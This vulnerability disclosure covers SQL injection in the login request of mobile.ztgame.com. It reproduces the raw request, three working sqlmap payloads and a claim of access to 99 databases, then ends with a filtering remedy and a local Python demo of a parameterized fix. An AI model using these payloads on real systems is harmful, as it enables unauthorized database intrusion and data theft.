An important app on Giant's network has a SQL injection that exposes 99 databases.
Vulnerable Android app:
http://mobile.ztgame.com/mobile/index.php
Once the Android app is installed, the login request it sends on start-up is vulnerable to SQL injection.
POST /mobileapp/index.php HTTP/1.1
Host: mobile.ztgame.com
Connection: keep-alive
Content-Length: 52
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://mobile.ztgame.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI NOTE LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://mobile.ztgame.com/mobileapp/index.php
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en-US;q=0.8
Cookie: PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3

act=setsubmit&username=admin&password=123456&openId=
Several injection techniques work on the username parameter:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=setsubmit&username=admin' RLIKE (SELECT (CASE WHEN (1364=1364) THEN 0x61646d696e ELSE 0x28 END)) AND 'zBPi'='zBPi&password=123456&openId=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: act=setsubmit&username=admin' AND (SELECT 3506 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(3506=3506,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'CTYM'='CTYM&password=123456&openId=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: act=setsubmit&username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))umgI) AND 'IDKo'='IDKo&password=123456&openId=
---
[05:25:33] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.4.4
back-end DBMS: MySQL 5.0
99 databases are reachable. Dumping the data is beside the point; you know better than I do what they contain.
Intuition tells me that this amount of data is very important. As a white hat with disciplined operations, I can check the logs before I exit the database.
Solution:
Filter the user-supplied parameters before they reach the query.
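As an added illustration (not code from the original report, and not the real app's code), the boolean-based payload from the sqlmap output above is modelled against a constructed SQLite login lookup, with SQLite's REGEXP standing in for MySQL's RLIKE and an assumed users table, beside the parameterized lookup that closes the oracle:

```python
import re
import sqlite3

# Constructed stand-in for the app's user table; the real schema is unknown.
def make_db():
    db = sqlite3.connect(":memory:")
    # SQLite has no REGEXP function; registering one stands in for MySQL's RLIKE.
    db.create_function("regexp", 2, lambda pat, s: re.search(pat, str(s)) is not None)
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'not-123456')")
    return db

def lookup_vulnerable(db, username):
    # The username is spliced into the SQL text: a quote in the value closes
    # the string literal and everything after it is parsed as SQL.
    sql = f"SELECT username, password FROM users WHERE username='{username}'"
    return db.execute(sql).fetchone()

def lookup_fixed(db, username):
    # Bound parameter: the whole value stays one string literal, never SQL.
    sql = "SELECT username, password FROM users WHERE username=?"
    return db.execute(sql, (username,)).fetchone()

def login_response(lookup, db, username, password):
    # A login whose "no such user", "wrong password" and error responses differ
    # hands a one-bit oracle per request to whoever controls `username`.
    try:
        row = lookup(db, username)
    except sqlite3.Error:
        return "database error"
    if row is None:
        return "no such user"
    return "ok" if row[1] == password else "wrong password"

def page_payload(condition):
    # The report's boolean-based payload, with RLIKE spelled REGEXP for SQLite.
    # 0x61646d696e in the original decodes to 'admin' and 0x28 to '(': a valid
    # regex when the probed condition holds, an invalid one (query error) when not.
    return ("admin' REGEXP (SELECT (CASE WHEN (" + condition +
            ") THEN 'admin' ELSE '(' END)) AND 'zBPi'='zBPi")

def oracle_leaks(lookup):
    # True when the true/false variants of the payload get different responses.
    db = make_db()
    when_true = login_response(lookup, db, page_payload("1364=1364"), "123456")
    when_false = login_response(lookup, db, page_payload("1364=1365"), "123456")
    return when_true != when_false

if __name__ == "__main__":
    print("vulnerable leaks:", oracle_leaks(lookup_vulnerable))  # True
    print("fixed leaks:", oracle_leaks(lookup_fixed))            # False
```

With the concatenated query the true and false probes return "no such user" and "database error" respectively, which is exactly the response difference a blind technique keys on; with the bound parameter both probes are just a username that does not exist.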